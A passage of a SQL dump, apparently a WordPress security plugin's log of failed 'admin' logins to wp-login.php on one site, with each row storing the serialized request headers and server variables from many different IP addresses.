00:00:00'),(93729,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/UK9GLAnCA0BlAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51608\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.165.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744785583.515132;s:12:\"REQUEST_TIME\";i:1744785583;}}','176.126.165.66',0,'2025-04-16 12:09:45','1970-01-01 00:00:00'),(93730,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:68:\"wordpress_test_cookie=WP+Cookie+check; _uid=rB8jg2f/U81GLAnCA0H0Ag==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49104\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744786381.6440539;s:12:\"REQUEST_TIME\";i:1744786381;}}','162.0.215.190',0,'2025-04-16 12:23:03','1970-01-01 00:00:00'),(93731,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51860\";s:11:\"REMOTE_ADDR\";s:15:\"185.199.236.107\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744935563.0554979;s:12:\"REQUEST_TIME\";i:1744935563;}}','185.199.236.107',0,'2025-04-18 05:49:24','1970-01-01 00:00:00'),(93732,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45382\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.105\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744936136.967422;s:12:\"REQUEST_TIME\";i:1744936136;}}','162.0.232.105',0,'2025-04-18 05:58:58','1970-01-01 00:00:00'),(93733,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41626\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.237.78\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744936711.6730959;s:12:\"REQUEST_TIME\";i:1744936711;}}','188.166.237.78',0,'2025-04-18 06:08:33','1970-01-01 00:00:00'),(93734,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51008\";s:11:\"REMOTE_ADDR\";s:14:\"195.26.245.159\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744937302.590055;s:12:\"REQUEST_TIME\";i:1744937302;}}','195.26.245.159',0,'2025-04-18 06:18:24','1970-01-01 00:00:00'),(93735,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46820\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.255.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744937910.7336459;s:12:\"REQUEST_TIME\";i:1744937910;}}','162.213.255.38',0,'2025-04-18 06:28:32','1970-01-01 00:00:00'),(93736,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48830\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.13\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744938528.4695909;s:12:\"REQUEST_TIME\";i:1744938528;}}','198.54.114.13',0,'2025-04-18 06:38:50','1970-01-01 00:00:00'),(93737,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34922\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.165.66\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744939131.8987579;s:12:\"REQUEST_TIME\";i:1744939131;}}','176.126.165.66',0,'2025-04-18 06:48:53','1970-01-01 00:00:00'),(93738,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60828\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.123.234\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744939733.7198341;s:12:\"REQUEST_TIME\";i:1744939733;}}','68.65.123.234',0,'2025-04-18 06:58:55','1970-01-01 00:00:00'),(93739,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48438\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.235.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964